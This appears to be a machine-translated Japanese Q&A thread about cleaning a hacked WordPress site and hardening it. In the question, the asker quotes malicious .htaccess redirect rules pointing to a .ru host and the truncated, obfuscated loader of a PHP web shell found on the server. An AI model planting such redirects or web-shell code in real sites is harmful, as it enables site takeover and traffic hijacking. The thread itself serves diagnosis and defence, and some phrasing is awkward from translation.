攻撃されたWebサイトをクリーンアップする
モンスが少ないため、クライアントのWebサイトはボットによって攻撃されます。私はウェブサイトのソースを変更しました(現在wordpress最後のバージョン)、きれいにしようと試みますが、ボットはセキュリティの穴を見つけます...
ボットアクションの後、これを含むWebサイトで.htaccessファイルを見つけることができます。
ErrorDocument 400 http://**********.ru/upday/index.php
ErrorDocument 401 http://**********.ru/upday/index.php
[...]
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|
altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|
metacrawler|bing|dogpile|facebook|Twitter|blog|live|myspace|mail|yandex|
rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch
|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search
|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick
|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey
|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro
|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase
|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
RewriteRule ^(.*)$ http://*******.ru/upday/index.php [R=301,L]
[...]
私はログファイルで.htaccessを追加するために使用されたファイルを見つけることができます:
77.84.28.xxx domain.tdl - [23/Feb/2012:00:00:00 +0100] "POST /fichiers/cookiemw5.php
HTTP/1.1" 200 34 "-" "-"
このコードを内部に:
<?php $auth_pass="";$color="#df5";$default_action="FilesMan";$default_use_ajax=true;
$default_charset="Windows-1251";preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A
\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64
\x65\x28'7X1re9s2z/Dn9VcwmjfZq+PYTtu7s2MnaQ5t2jTpcugp6ePJsmxrkS1PkuNkWf77C4Ck
REqy43S738N1vbufp7FIEARJkARBAHT7xRVnNIlui4XO6d7Jx72TC/PN2dmHzjl8dbZf7x2dmd9KJXbHC
tPQCbYHzjgKWYtZQWDdFo3Xvj/wHKPMjFNvGkzwx/vTo1d+hL9cq2MF9tC9dgL8/GKNe84N/jqxRl0PEk
tN5vaLk8AZdEZWZA+L5prJKswdTTy/5xTNv82yWm0J8sw1FxMfoHXoWD0nKFLuWq1SZc+qz9iRH7F9fzru
mVCvc+NGTXYP/9tyx24ndKKi6QSBH3Q8f2CWj84PDwEqyYPUDuWHZrmq5Yysm45z49jTyPXHncgdOQICcu
mz47kjNyrGaSNr4NqdP6d+5ISdYDpGGJ7bc/ruGNr96fS4A607PTg+gsaa9cpzk3fVIF18MLGL1OL+dGwj
AQzKhlHgTkLPCodOWCzQSCFI4 [...]
.phpファイル、.htaccessファイルを削除しますが、数時間または数分後に表示されます...穴を見つけてボット攻撃を阻止するにはどうすればよいですか?
(共有ホスティング(ovh.com)にあります)
基本的なセキュリティ手順
Wordpressは非常に人気があるため、基本的なセキュリティの欠陥を利用して、多くの ハッキングによるドライブ があります。すべてのWordpressユーザーは、以下の基本的かつ簡単な手順を実行して自分自身を保護する必要があります。
- データベーステーブルのプレフィックスとしてwp_を使用せず、魅力的なランダム文字列を使用します。
- Wordpress DBエラーをオフにします。
- ディレクトリがchmod 755およびファイル644に設定されていることを確認してください。
- セキュリティで保護されたパスワードジェネレーター を使用します(少なくとも15文字を使用します)。
- ユーザー名としてadminを使用しないでください。
- 空の.htaccessファイルをwp-adminディレクトリに配置します。
- 読み取りWordpress強化
- 隠れたマルウェアがないか、サイトのGoogleキャッシュを確認してください。
- Functions.phpファイルに
remove_action('wp_head', 'wp_generator');を配置して、サイトのヘッダーから<meta name="generator" content="WordPress X.X.X" />を削除します(攻撃者によるドライブでは、ターゲットとするバージョンを簡単に見つけることはできません)。
TimThumb Hack
また、 人気のあるtim thumbスクリプトの古いバージョンに関連するハッキングによる非常に人気のあるドライブ があり、これはウェブマスターに多くの問題を引き起こします。これを回避するには、アップロードディレクトリでphpファイルを確認し、最新バージョンのスクリプトにアップグレードしたことを確認してください。
アドバイス
私は約10種類のWordpressを実行していますが、WP-Securityプラグインとアカウントを website defender から見つけました。サイトを定期的にスキャンし、セキュリティエラー、マルウェア、さらにはページエラーをメールで報告します。何かがうまくいかないときは、必ず知っておいてください。
WP-Firewall は、0-Dayエクスプロイトに対する防御にも非常に便利です。 VirusTotal は、感染が疑われる場合に便利です。
Akismet および Disqus.com は、コメントスパムを防ぐための便利なツールです。 このテーマに関するウェブマスタープロコミュニティwiki をお読みください。
ウェブマスターツール
また、ウェブマスターツールにも登録する必要があります。ただし、感染が疑われる場合は、すべての手順を実行して最初に検出してクリーンアップします報告された攻撃サイト。
感染を検出すると、Googleは次のすべてのアドレスabuse@, admin@, administrator@, contact@, info@, postmaster@, support@, webmaster@にメールを送信するため、これらのうち少なくとも1つが適切に配置され、監視されていることを確認する必要があります。
有料削除サービス/ヘルプの入手先
有料のマルウェア削除サービスを提供するサイトもいくつかありますが、私はこれらの非常に疑わしいになります-多くはある種の詐欺のようです。
wordpress forums の free には、質の高いヘルプとサポートが豊富にあります。ここでは、ウェブマスタープロの wordpress stackexchange site =およびon stackoverflow 。自分で修正できるものにお金を払わないでください。
Webサイトからすべてのファイルを完全に削除し、Wordpressを新規インストールする必要があります。可能性は、彼らがあなたのサイトへの継続的なアクセスを可能にするファイルをアップロードしたことです。ファイルごとにファイルを移動する場合を除き、それらが最初から完全にインストールされているかどうかを把握しようとするのが最善の方法です。